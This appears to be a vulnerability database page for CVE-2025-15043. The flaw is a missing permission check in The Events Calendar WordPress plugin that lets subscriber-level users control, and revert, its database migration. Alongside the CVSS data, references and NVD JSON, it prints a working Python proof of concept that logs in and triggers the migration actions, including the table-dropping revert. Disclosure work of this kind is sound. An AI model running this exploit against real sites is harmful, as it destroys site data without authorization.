CVE-2025-15043

Description

The The Events Calendar plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the 'start_migration', 'cancel_migration', and 'revert_migration' functions in all versions up to, and including, 6.15.13. This makes it possible for authenticated attackers, with subscriber level access and above, to start, cancel, or revert the Custom Tables V1 database migration, including dropping the custom database tables entirely via the revert action.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

The Events Calendar < 6.15.13.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-15043 PoC - The Events Calendar Plugin Unauthorized Migration Control
Note: This PoC is for educational and authorized testing purposes only.
"""

import requests
import sys

TARGET_URL = "https://vulnerable-site.com/wp-admin/admin-ajax.php"
USERNAME = "attacker"
PASSWORD = "password"

def get_wordpress_nonce(session, url):
    """Attempt to get a valid nonce from the target site"""
    response = session.get(f"{url.replace('/admin-ajax.php', '')}/wp-admin/admin.php?page=tribe-common")
    if 'nonce' in response.text:
        import re
        nonce_match = re.search(r'nonce":"([a-z0-9]+)"', response.text)
        if nonce_match:
            return nonce_match.group(1)
    return None

def exploit_migration(session, action, nonce=None):
    """Send migration control request"""
    data = {
        'action': action,
        'tribe_attachment': '1',
        '_wpnonce': nonce or ''
    }
    
    if nonce:
        data['_wp_http_referer'] = '/wp-admin/admin.php?page=tribe-common'
    
    response = session.post(TARGET_URL, data=data)
    return response

def main():
    session = requests.Session()
    
    # Step 1: Authenticate
    print("[*] Authenticating to WordPress...")
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In',
        'testcookie': '1'
    }
    
    response = session.post(
        f"{TARGET_URL.replace('/admin-ajax.php', '/wp-login.php')}",
        data=login_data
    )
    
    if 'wordpress_logged_in' not in session.cookies:
        print("[-] Authentication failed")
        sys.exit(1)
    
    print("[+] Authentication successful")
    
    # Step 2: Try to get nonce (optional in some configurations)
    nonce = get_wordpress_nonce(session, TARGET_URL)
    if nonce:
        print(f"[+] Obtained nonce: {nonce[:10]}...")
    
    # Step 3: Execute migration operations
    actions = [
        ('tribe_start_migration', 'Start Migration'),
        ('tribe_cancel_migration', 'Cancel Migration'),
        ('tribe_revert_migration', 'REVERT MIGRATION (DANGEROUS)')
    ]
    
    for action, description in actions:
        print(f"\n[*] Executing: {description}")
        response = exploit_migration(session, action, nonce)
        print(f"[*] Status: {response.status_code}")
        print(f"[*] Response: {response.text[:200]}")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15043
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15043
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15043/
[4] VulDB https://vuldb.com/cve/CVE-2025-15043
[5] https://plugins.trac.wordpress.org/changeset?old_path=/the-events-calendar/tags/6.15.13&new_path=/the-events-calendar/tags/6.15.13.1
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/346a5b00-fb76-4413-a935-a2df4dc51984?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15043", "sourceIdentifier": "[email protected]", "published": "2026-01-20T15:16:15.350", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The The Events Calendar plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the 'start_migration', 'cancel_migration', and 'revert_migration' functions in all versions up to, and including, 6.15.13. This makes it possible for authenticated attackers, with subscriber level access and above, to start, cancel, or revert the Custom Tables V1 database migration, including dropping the custom database tables entirely via the revert action."}, {"lang": "es", "value": "El plugin The Events Calendar para WordPress es vulnerable a acceso no autorizado debido a una comprobación de capacidad faltante en las funciones 'start_migration', 'cancel_migration' y 'revert_migration' en todas las versiones hasta la 6.15.13, inclusive. Esto hace posible que atacantes autenticados, con acceso de nivel de suscriptor y superior, inicien, cancelen o reviertan la migración de la base de datos Custom Tables V1, incluyendo la eliminación completa de las tablas de base de datos personalizadas a través de la acción de reversión."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?old_path=/the-events-calendar/tags/6.15.13&new_path=/the-events-calendar/tags/6.15.13.1", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/346a5b00-fb76-4413-a935-a2df4dc51984?source=cve", "source": "[email protected]"}]}}